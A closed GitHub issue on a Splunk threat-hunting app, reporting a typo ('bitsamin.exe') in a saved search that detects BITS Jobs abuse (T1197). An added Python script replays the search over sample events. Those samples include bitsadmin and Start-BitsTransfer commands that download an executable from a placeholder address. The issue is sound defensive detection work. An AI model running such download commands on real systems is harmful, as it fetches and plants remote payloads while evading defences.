Closed brianyaucy closed 5 years ago
There is a typo in the saved search `[T1197] BITS Jobs - Process`: `bitsamin.exe`

To correct, in `default/savedsearches.conf`, find

```
[[T1197] BITS Jobs - Process]
action.email.useNSSubject = 1
action.summary_index = 1
action.summary_index._name = threathunting
action.summary_index.mitre_category = Persistence,Defense_Evasion
action.summary_index.mitre_technique = BITS Jobs
action.summary_index.mitre_technique_id = T1197
alert.track = 0
cron_schedule = */15 * * * *
dispatch.earliest_time = -15m@m
dispatch.latest_time = now
enableSched = 1
schedule_window = auto
request.ui_dispatch_app = ThreatHunting
request.ui_dispatch_view = search
search = `indextime` ((`sysmon` event_id=1) OR (`windows-security` event_id=4688)) (process_name="bitsamin.exe" OR process_command_line="*Start-BitsTransfer*") \
| eval mitre_technique_id="T1197" \
| eval hash_sha256= lower(hash_sha256)\
| `process_create_whitelist`\
| eval indextime = _indextime | convert ctime(indextime) | table _time indextime event_description hash_sha256 host_fqdn user_name process_path process_guid process_parent_path process_id process_parent_id process_command_line process_parent_command_line process_parent_guid
```

To correct, change `bitsamin.exe` to `bitsadmin.exe` in `search`.
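As an added example (not code from the ThreatHunting app or from the issue author), the following Python emulates the filter clause of the `[T1197] BITS Jobs - Process` search over a few constructed process-creation events, to show what the typo costs in coverage: with `bitsamin.exe` the search only fires on the PowerShell `Start-BitsTransfer` branch, and every direct `bitsadmin.exe` execution is silently dropped. It assumes Splunk's `field=value` semantics (case-insensitive comparison, `*` as wildcard) and leaves out the `indextime` and `process_create_whitelist` macros; the hosts, users, address and command lines are made up.

```python
import re

# Constructed sample events (Sysmon event_id 1 and Windows Security 4688),
# using the field names the saved search tables. Hosts, users and the
# 198.51.100.7 address are placeholders, not real telemetry.
SAMPLE_EVENTS = [
    {"event_id": 1, "host_fqdn": "ws01.corp.example", "user_name": "CORP\\jdoe",
     "process_name": "bitsadmin.exe",
     "process_command_line": "bitsadmin.exe /transfer upd /download /priority high "
                             "http://198.51.100.7/update.exe C:\\Users\\Public\\update.exe"},
    {"event_id": 4688, "host_fqdn": "ws02.corp.example", "user_name": "CORP\\asmith",
     "process_name": "powershell.exe",
     "process_command_line": "powershell.exe -nop -c \"Start-BitsTransfer -Source "
                             "http://198.51.100.7/update.exe -Destination C:\\Users\\Public\\update.exe\""},
    {"event_id": 1, "host_fqdn": "srv01.corp.example", "user_name": "CORP\\svc_backup",
     "process_name": "BITSADMIN.EXE",  # different case: an SPL field match still hits this
     "process_command_line": "BITSADMIN.EXE /list /allusers"},
    {"event_id": 5, "host_fqdn": "ws01.corp.example", "user_name": "CORP\\jdoe",
     "process_name": "bitsadmin.exe"},  # process-terminate event, outside the event_id gate
    {"event_id": 4688, "host_fqdn": "ws03.corp.example", "user_name": "CORP\\bwu",
     "process_name": "notepad.exe",
     "process_command_line": "notepad.exe C:\\Users\\bwu\\bits.txt"},
]

MITRE_TECHNIQUE_ID = "T1197"
PROCESS_CREATE_EVENT_IDS = {1, 4688}  # (`sysmon` event_id=1) OR (`windows-security` event_id=4688)


def spl_value_to_regex(pattern):
    """Translate an SPL field value into a regex: '*' is a wildcard and the
    comparison is case-insensitive, mirroring Splunk's field=value matching."""
    parts = [re.escape(p) for p in pattern.split("*")]
    return re.compile(".*".join(parts), re.IGNORECASE | re.DOTALL)


def bits_jobs_filter(events, process_name="bitsadmin.exe"):
    """Emulate the search's filter clause and return the rows it would pass
    down the pipeline, with mitre_technique_id added as the eval does."""
    name_re = spl_value_to_regex(process_name)
    cmd_re = spl_value_to_regex("*Start-BitsTransfer*")
    hits = []
    for event in events:
        if event.get("event_id") not in PROCESS_CREATE_EVENT_IDS:
            continue
        if (name_re.fullmatch(event.get("process_name", "")) is not None
                or cmd_re.fullmatch(event.get("process_command_line", "")) is not None):
            hits.append(dict(event, mitre_technique_id=MITRE_TECHNIQUE_ID))
    return hits


def coverage_gap(events, typo="bitsamin.exe", fixed="bitsadmin.exe"):
    """(host_fqdn, command line) of rows the corrected search returns but the
    typo'd search drops, i.e. the detections lost to the misspelling."""
    def key(row):
        return (row["host_fqdn"], row.get("process_command_line", ""))
    typo_keys = {key(r) for r in bits_jobs_filter(events, typo)}
    return [key(r) for r in bits_jobs_filter(events, fixed) if key(r) not in typo_keys]


if __name__ == "__main__":
    for name in ("bitsamin.exe", "bitsadmin.exe"):
        rows = bits_jobs_filter(SAMPLE_EVENTS, name)
        print(f'process_name="{name}": {len(rows)} hit(s)')
        for r in rows:
            print(f"  {r['host_fqdn']:20} {r['user_name']:16} {r['process_command_line'][:60]}")
    print("missed because of the typo:")
    for host, cmd in coverage_gap(SAMPLE_EVENTS):
        print(f"  {host:20} {cmd[:60]}")
```

Running it shows one hit with the misspelled name (the PowerShell cmdlet branch) and three with the corrected one; the two `bitsadmin.exe` executions, including the upper-case one, are the rows the typo loses.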
thanks! this has been addressed in the next push